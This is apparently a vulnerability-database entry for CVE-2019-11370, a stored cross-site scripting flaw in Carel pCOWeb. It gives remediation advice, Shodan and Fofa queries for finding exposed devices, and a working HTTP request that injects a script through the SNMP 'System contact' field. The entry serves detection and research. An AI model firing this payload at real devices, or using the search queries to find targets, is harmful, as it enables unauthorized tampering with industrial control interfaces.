🔙 목록으로 돌아가기

CVE-2019-11370: Carel pCOWeb
TitleCarel pCOWeb
Authorarafatansari
SeverityMedium
ImpactAllows attackers to inject malicious scripts into web pages viewed by users, leading to potential data theft or unauthorized actions.
RemediationApply the latest patch or upgrade to a version that addresses the vulnerability.
CVSS Score5.4
EPSS Score0.07622
CVE IDCVE-2019-11370
CWE IDCWE-79
Shodan Queryhttp.html:"pCOWeb"http.html:"pcoweb"
Fofa Querybody="pcoweb"
Tags cve cve2019 pcoweb xss carel edb vkev vuln

🔍 Vulnerability Description

Carel pCOWeb prior to B1.2.4 is vulnerable to stored cross-site scripting, as demonstrated by the config/pw_snmp.html “System contact” field.

🌐 HTTP Request

POST /config/pw_snmp_done.html HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/603.3.8 (KHTML, like Gecko) Version/10.1.2 Safari/603.3.8
Connection: close
Content-Length: 112
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

%3Fscript%3Asetdb%28%27snmp%27%2C%27syscontact%27%29=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
GET /config/pw_snmp.html HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (ZZ; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36
Connection: close
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2019/CVE-2019-11370.yaml

🦈 Packet Capture: ⬇️ Download cve-2019-11370.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A